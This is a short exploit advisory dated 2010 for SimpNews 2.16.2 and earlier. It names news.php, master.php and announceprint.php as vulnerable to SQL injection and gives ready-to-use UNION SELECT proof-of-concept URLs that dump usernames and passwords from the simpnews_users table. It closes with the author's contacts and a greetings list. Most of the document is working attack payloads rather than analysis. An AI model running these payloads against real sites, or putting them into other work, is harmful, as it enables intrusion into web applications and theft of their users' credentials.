SimpNews 2.16.2 and Below Multiple SQL Injection Vulnerabilities :

Date : 2010-04-01 Author : NoGe

==============================================================================================================


  [o] SimpNews Multiple SQL Injection Vulnerabilities

       Software : SimpNews version 2.16.2 and below
       Vendor   : http://www.boesch-it.de/
       Author   : NoGe
       Contact  : noge[dot]code[at]gmail[dot]com
       Blog     : http://evilc0de.blogspot.com/
       Home     : http://antisecurity.org/


==============================================================================================================


  [o] Vulnerable file

       news.php
       master.php
       announceprint.php


  [o] Exploit

       http://localhost/[path]/news.php?category=[sql]
       http://localhost/[path]/master.php?newsnr=[sql]
       http://localhost/[path]/announceprint.php?announcenr=[sql]


  [o] PoC

       http://localhost/news.php?category=2+AND+1=2+UNION+ALL+SELECT+1,GROUP_CONCAT(username,0x3a,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21+FROM+simpnews_users--
       http://localhost/master.php?newsnr=-999+UNION+SELECT+0,0,0,password,username,username,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0%20FROM+simpnews_users+WHERE+usernr=1--
       http://localhost/announceprint.php?announcenr=1+AND+1=2+UNION+ALL+SELECT+1,2,3,4,GROUP_CONCAT(username,0x3a,password),6,7,8,9,10,11,12,13,14,15+FROM+simpnews_users--


==============================================================================================================


  [o] Greetz

       Vrs-hCk OoN_BoY Paman zxvf Angela Zhang aJe martfella
       H312Y yooogy mousekill }^-^{ noname matthews s4va stardustmemory :*
       skulmatic OLiBekaS ulga Cungkee k1tk4t str0ke

==============================================================================================================

C1

 

C2

 

C3